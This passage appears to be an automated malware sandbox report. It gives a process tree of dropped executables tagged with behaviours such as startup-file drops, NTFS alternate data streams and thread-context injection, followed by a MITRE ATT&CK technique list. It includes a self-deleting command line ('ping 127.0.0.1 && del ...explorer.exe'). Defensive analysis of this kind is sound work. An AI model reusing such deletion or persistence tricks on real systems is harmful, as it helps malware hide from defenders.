    "C:\Users\Admin\AppData\Roaming\54B5.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6104
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      4⤵
      Drops startup file
      PID:5840
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
    3⤵
    PID:5984
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4784

C:\Users\Admin\AppData\Local\Temp\FE97.exe
C:\Users\Admin\AppData\Local\Temp\FE97.exe
1⤵
- Executes dropped EXE
- Drops startup file
- NTFS ADS
PID:5528

C:\Users\Admin\AppData\Local\Temp\399.exe
C:\Users\Admin\AppData\Local\Temp\399.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6088

C:\Users\Admin\AppData\Local\Temp\D1F.exe
C:\Users\Admin\AppData\Local\Temp\D1F.exe
1⤵
- Executes dropped EXE
PID:5108

C:\Users\Admin\AppData\Local\Temp\12DD.exe
C:\Users\Admin\AppData\Local\Temp\12DD.exe
1⤵
- Executes dropped EXE
PID:5456

C:\Users\Admin\AppData\Local\Temp\18CA.exe
C:\Users\Admin\AppData\Local\Temp\18CA.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4908
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:1328

C:\Users\Admin\AppData\Local\Temp\24D1.exe
C:\Users\Admin\AppData\Local\Temp\24D1.exe
1⤵
- Executes dropped EXE
PID:2592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 276
  2⤵
  - Program crash
  PID:1148

C:\Users\Admin\AppData\Local\Temp\2CE0.exe
C:\Users\Admin\AppData\Local\Temp\2CE0.exe
1⤵
- Executes dropped EXE
PID:5468

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5540

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5052

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4356

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5696

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:4548

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5260

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6028

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3984

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\71C0.exe
C:\Users\Admin\AppData\Local\Temp\71C0.exe
1⤵
- Executes dropped EXE
PID:6052

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery